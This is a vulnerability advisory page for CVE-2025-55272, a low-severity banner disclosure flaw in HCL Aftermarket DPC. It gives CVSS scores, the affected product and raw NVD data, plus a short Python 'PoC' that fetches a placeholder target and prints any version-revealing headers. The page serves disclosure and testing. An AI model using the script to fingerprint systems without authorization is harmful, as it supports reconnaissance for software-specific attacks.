Security Vulnerability Report
中文
CVE-2025-55272 CVSS 3.1 LOW

CVE-2025-55272

Published: 2026-03-26 13:16:27
Last Modified: 2026-03-26 19:43:11

Description

HCL Aftermarket DPC is affected by Banner Disclosure vulnerability where attackers gain insights into the system’s software and version details which would allow them to craft software specific attacks.

CVSS Details

CVSS Score
3.1
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:hcltech:aftermarket_cloud:1.0.0:*:*:*:*:*:*:* - VULNERABLE
HCL Aftermarket DPC (具体受影响版本请参考厂商公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def check_banner_disclosure(url): """ PoC for CVE-2025-55272: Banner Disclosure Vulnerability. This script checks if the target reveals version information in headers. """ try: # Send a basic HTTP GET request response = requests.get(url, timeout=10) # Check for common headers that might leak version info server_header = response.headers.get('Server') powered_by = response.headers.get('X-Powered-By') print(f"[+] Target: {url}") print(f"[+] Status Code: {response.status_code}") if server_header: print(f"[!] Potential Disclosure - Server Header: {server_header}") if powered_by: print(f"[!] Potential Disclosure - X-Powered-By: {powered_by}") # Check response body for specific product signature if "HCL Aftermarket DPC" in response.text: print("[!] Product signature found in response body.") except requests.exceptions.RequestException as e: print(f"[-] Error connecting to target: {e}") if __name__ == "__main__": target = "http://target-ip:port" # Replace with actual target check_banner_disclosure(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-55272", "sourceIdentifier": "[email protected]", "published": "2026-03-26T13:16:26.720", "lastModified": "2026-03-26T19:43:11.207", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL Aftermarket DPC is affected by Banner Disclosure vulnerability where attackers gain insights into the system’s software and version details which would allow them to craft software specific attacks."}, {"lang": "es", "value": "HCL Aftermarket DPC se ve afectado por una vulnerabilidad de divulgación de banner donde los atacantes obtienen información sobre los detalles del software y la versión del sistema, lo que les permitiría diseñar ataques específicos de software."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N", "baseScore": 3.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:aftermarket_cloud:1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "C71E5E64-ED4C-4763-8A74-5F9DDCFD13DA"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129793", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}